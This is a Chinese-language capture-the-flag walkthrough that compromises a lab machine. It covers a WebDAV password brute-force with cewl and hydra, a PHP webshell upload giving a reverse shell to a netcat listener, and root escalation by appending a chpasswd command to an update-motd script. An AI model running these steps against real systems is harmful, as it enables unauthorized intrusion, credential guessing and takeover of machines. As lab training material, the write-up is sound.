1.先查询攻击机ip
2.使用namp 192.168.2.0/24扫描该网段的地址,寻找靶机IP
经过对开放端口和服务的扫描,发现只开放了22端口和80端口
3.直接访问192.168.2.149
dirb是一个基于字典的web目录扫描工具,采用递归的方式来获取更多的目录,可以查找到已知的和隐藏的目录,它还支持代理和http认证限制访问的网站在渗透测试过程中,是一个非常好用的工具 帮我们扫描服务器群,看在这个ip地址下含有什么环境
4.进行目录扫描,dirb目录扫描工具(kali自带的),使用命令dirb http://192.168.2.149/,扫描后发现有3个网址,发现有webdav网址
WebDAV上传和下载的环境(文件上传漏洞有关系)
Cadaver工具(死尸)
cadaver-Unix的命令行WebDAV客户端。cadaver支持文件上载,下载,屏幕显示,名称空间操作(移动和复制),集合创建和删除以及锁定操作,其操作类似于标准BSD ftp(1)客户端和Samba项目的smbclient(1)。 熟悉这些工具的用户应该会对cadaver相当熟悉。
cadaver支持通过.netrc文件自动登录到需要身份验证的服务器(类似于ftp(1)-请参见下面的“ .netrc文件”一节)。
5.利用webdav客户端,思路:cadaver http://192.168.2.149/webdav——连接Put webshell.php——上传木马
6.出现要输入用户和密码,但是我们不知道 所以就想到了暴力破解,使用cewl这个工具
Cewl是一款采用Ruby开发的应用程序,可以给他的爬虫指定URL地址和爬取深度,还可以添加外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper
这样的密码破解工具中。(爬取字典)
7. 使用cewl——爬行网站创建密码字典,使用方法 cewl http://192.168.2.149/ -w 123.txt
然后cat 123.txt 打开爬取的字典
hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大
kali下是默认安装的,几乎支持所有协议的在线破解。
Hydra适用语法:hydra 参数 IP
8.使用hydra自动化爆破工具,使用方法 hydra -L 123.txt -P 123.txt 192.168.2.149 http-get /webdav
9.创建webshell.php 注意修改IP和端口
使用put webshell.php上传,注意webshell路径
10.上传成功之后,需要访问192.168.2.149建立反向连接,访问网站之前开启监听,监听命方法如下:nc -lvvp 80
这样就算是反弹了一个shell到kali的监听端口
在这里看一下权限:whoami
11.kali监听到端口,成功getshell,接下来就是寻找flag了,先获取一个交互式shell,调用python的包,更好地展示结果。
python3 -c 'import pty;pty.spawn("/bin/bash")'
12.linux在home下存在用户名
进入inferno目录下发现第一个flag
13.其他用户目录下的文件拒绝访问,说明权限不够,需要提权
查看其他目录下的文件,在mnt目录下发现一个hell.sh文件
发现一串bf编码,百度解码Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]
复制过来,点击brainfuck to text即可
14.得到一串密码,不知道是哪个用户的,一个一个用SSH尝试连接,测出是inferno用户的
15.拿下第一个flag。这里利用motd提权
这里利用motd提权
修改文件 /etc/update-motd.d/00-header
1.进入到文件夹 /etc/update-motd.d/
2.修改文件 echo "echo 'root:admin'|sudo chpasswd">>00-header
3.重新登录
4. 切换管理员
16.退出再次登录 切换用户root ,使用之前写进去的密码admin成功登录 获取第二个flag: